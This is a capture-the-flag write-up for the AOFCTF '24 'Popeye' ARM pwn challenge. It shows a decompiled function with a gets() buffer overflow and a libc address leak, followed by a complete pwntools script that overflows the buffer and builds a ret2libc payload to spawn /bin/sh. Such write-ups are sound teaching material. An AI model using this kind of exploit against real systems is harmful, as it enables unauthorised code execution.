Published on

AOFCTF '24 - Pwn - Popeye

Authors

Challenge Description

alt text

Solution

Popeye was probably the most easiest challenge in AOFCTF, we already had a Libc leak, so we didn't have to do much. Also, it had a straight forward buffer overflow. But, since it was on ARM, most people didn't even try it :((( :welp:

I don't think I even need to explain this chall, so I'll just paste the solve script here, the decompiled code:

void vuln(void)
{
  char acStack_20 [32];

  printf("[To make it easier: %p]\n",puts);
  gets(acStack_20);
  return;
}

To solve script is:

exploit.py
#!/usr/bin/env python3

from pwn import *
context.terminal = ["tmux", "splitw", "-h"]

elf = context.binary = ELF("./popeye")
io = remote(sys.argv[1], int(sys.argv[2])) if args.REMOTE else process()
libc = ELF("./libc.so.6")

io.recvuntil(b": ")
libc.address = int(io.recvuntil(b"]")[:-1], 16) - libc.sym.puts
info("libc @ %#x" % libc.address)
payload = flat(
    cyclic(40, n=8),
    0x0000000000400944,
    next(libc.search(b"/bin/sh\x00")),
    libc.sym.system
)

io.sendline(payload)
io.interactive()

You just had to extract the LIBC from the provided dockerfile (you could get the aarch64 libc using my script ;))

Discuss on TwitterView on GitHub